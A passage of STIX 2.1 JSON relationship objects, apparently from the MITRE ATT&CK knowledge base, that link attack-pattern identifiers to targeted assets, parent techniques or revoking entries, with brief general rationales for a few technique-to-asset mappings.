["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:56:54.642Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--99fa6d92-0c41-44ed-bd30-dd0413785883", "created": "2023-09-29T18:43:23.321Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:43:23.321Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9a3e771d-d84f-4f2a-baf9-4478abdbdbcf", "created": "2023-09-28T20:04:32.626Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:04:32.626Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9aae6d20-8645-4cd5-a0b3-d95676a4cd0a", "created": "2024-05-22T17:21:03.737Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T02:54:12.091Z", "description": "Asset Mapping Rationale: Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.", "relationship_type": "targets", "source_ref": "attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9acea9fd-5c35-4956-b048-4e22dad5a044", "created": "2020-10-02T16:37:30.083Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--cc723aff-ec88-40e3-a224-5af9fd983cc4", "target_ref": "attack-pattern--937e4772-8441-4e4a-8bf0-8d447d667e23", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9af1f7b6-d914-4916-9fee-e8ca0e9c8109", "created": "2020-03-13T20:21:54.906Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f", "target_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9b0b3c25-d87c-452a-a2f9-241234410eb8", "created": "2023-09-29T18:58:05.958Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-05-28T02:56:28.394Z", "description": "Asset Mapping Rationale: Adversaries may hook into application programming interface (API) functions used by processes to redirect calls for execution and privilege escalation means. ", "relationship_type": "targets", "source_ref": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9b72f375-4a14-4ae7-9b0b-1202ba3d6970", "created": "2020-03-02T14:22:24.910Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292", "target_ref": "attack-pattern--ac9e6b22-11bf-45d7-9181-c1cb08360931", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9ba76ea3-9ebb-49d7-803a-5cf2deef6875", "created": "2023-09-28T19:37:35.485Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:37:35.485Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9ba97a0a-1ae5-4969-9ce4-6fb86d70fae0", "created": "2020-03-06T20:57:38.085Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--29be378d-262d-4e99-b00d-852d573628e6", "target_ref": "attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9bbad839-fc09-488d-ab19-97a3d354fa29", "created": "2023-05-24T19:03:05.238Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-05-24T19:03:05.238Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--562e9b64-7239-493d-80f4-2bff900d9054", "target_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9c0db354-c2d6-4db0-bb76-35ae66c01dd1", "created": "2023-09-28T20:11:52.625Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:11:52.625Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9c23121e-14bb-4382-b54d-2ea02a2815b5", "created": "2023-09-28T19:59:44.009Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:59:44.009Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9cc440a2-5770-449d-8886-fcc0d221deaf", "created": "2023-04-12T22:27:54.023Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-04-12T22:27:54.023Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--bef8aaee-961d-4359-a308-4c2182bcedff", "target_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9d59578c-8356-4978-8765-acbf215948d4", "created": "2020-03-11T14:17:21.294Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00", "target_ref": "attack-pattern--3f18edba-28f4-4bb9-82c3-8aa60dcac5f7", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9d7be380-2dee-4f74-9464-1dea3c8ca6f4", "created": "2020-03-11T13:50:11.512Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--a3e1e6c5-9c74-4fc0-a16c-a9d228c17829", "target_ref": "attack-pattern--e6415f09-df0e-48de-9aba-928c902b7549", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9d925db0-de86-42c8-b69e-8d89e40328ed", "created": "2020-02-18T18:35:21.839Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--1df0326d-2fbc-4d08-a16b-48365f1e742d", "target_ref": "attack-pattern--b7dc639b-24cd-482d-a7f1-8897eda21023", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9dc0d9c5-1701-47b7-971f-4a1992203776", "created": "2020-02-11T18:45:34.404Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163", "target_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9e98d88c-4138-4d0e-8db0-cddf956ab500", "created": "2023-09-29T18:07:28.902Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:07:28.902Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9ef6f961-f383-4674-9c5c-6f5984cabee7", "created": "2023-09-07T21:50:12.131Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-07T21:50:12.131Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--bb5e59c4-abe7-40c7-8196-e373cb1e5974", "target_ref": "attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9f163bcc-193b-49f4-884d-4246dff23e6c", "created": "2020-02-18T16:48:56.805Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--677569f9-a8b0-459e-ab24-7f18091fa7bf", "target_ref": "attack-pattern--dcaa092b-7de9-4a21-977f-7fcb77e89c48", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9f2926a2-596f-459e-827e-6fe2d4646efd", "created": "2023-09-29T18:06:46.756Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:06:46.756Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9fa6797f-f2cb-4b93-b8eb-f40936e967f3", "created": "2023-09-28T21:12:14.470Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:12:14.470Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9feede0a-38c3-4aa7-8416-c2b0d0d67f83", "created": "2020-10-02T16:54:23.287Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120", "target_ref": "attack-pattern--67073dde-d720-45ae-83da-b12d5e73ca3b", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9ffbf620-8e1f-4542-a271-9a3692db9a47", "created": "2023-09-28T20:04:19.147Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:04:19.147Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a03f53c2-4445-4ca5-ab2a-624afcbb9ea4", "created": "2020-06-16T18:44:16.269Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--3b4121aa-fc8b-40c8-ac4f-afcb5838b72c", "target_ref": "attack-pattern--0708ae90-d0eb-4938-9a76-d0fc94f6eec1", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a10133d4-069f-4678-bcfb-72aeaa575296", "created": "2020-02-05T16:27:37.902Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082", "target_ref": "attack-pattern--b83e166d-13d7-4b52-8677-dff90c548fd7", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a15d718f-af30-4745-a837-887ba8f48727", "created": "2023-09-29T16:30:46.705Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:30:46.705Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f8df6b57-14bc-425f-9a91-6f59f6799307", "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a18306b6-e012-403d-acc9-3cb3ae3b2e67", "created": "2024-05-23T04:07:41.945Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T03:00:00.895Z", "description": "Asset Mapping Rationale: Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.[1] Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).", "relationship_type": "targets", "source_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a1a39cf1-dd69-4110-beac-77bf7acd0c62", "created": "2020-03-13T20:26:46.789Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2", "target_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a1d2df14-6f44-44ac-99c2-3e3f55f53476", "created": "2023-09-29T16:43:16.472Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:43:16.472Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fc5fda7e-6b2c-4457-b036-759896a2efa2", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a1d99bbc-8d7c-4263-a909-95a9507b43c3", "created": "2023-09-29T16:28:17.629Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:28:17.629Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a221bbb3-5f4f-4879-ae1d-37e8d3022039", "created": "2023-09-28T21:16:05.517Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:16:05.517Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a22e57a2-1d94-45eb-bc79-ec7106ae81c6", "created": "2020-06-09T15:36:04.088Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c", "target_ref": "attack-pattern--144e007b-e638-431d-a894-45d90c54ab90", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a23aefa6-15f5-481c-ac3d-09b8e4b3003b", "created": "2023-09-29T16:44:03.912Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:44:03.912Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a276f020-9642-4608-8520-fca70866c0d9", "created": "2020-02-20T15:27:18.841Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--0df05477-c572-4ed6-88a9-47c581f548f7", "target_ref": "attack-pattern--c675646d-e204-4aa8-978d-e3d6d65885c4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a2788f0f-70d5-4872-97f8-ce72d5a172b9", "created": "2020-01-28T13:50:22.647Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--635cbe30-392d-4e27-978e-66774357c762", "target_ref": "attack-pattern--e01be9c5-e763-4caf-aeb7-000b416aef67", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a287bc05-20cb-4476-ba1f-15bfde6e601d", "created": "2023-09-29T18:04:05.993Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:04:05.993Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a299b456-78d0-4cf2-accc-4dfd7b5cd74d", "created": "2020-10-02T17:08:07.889Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": 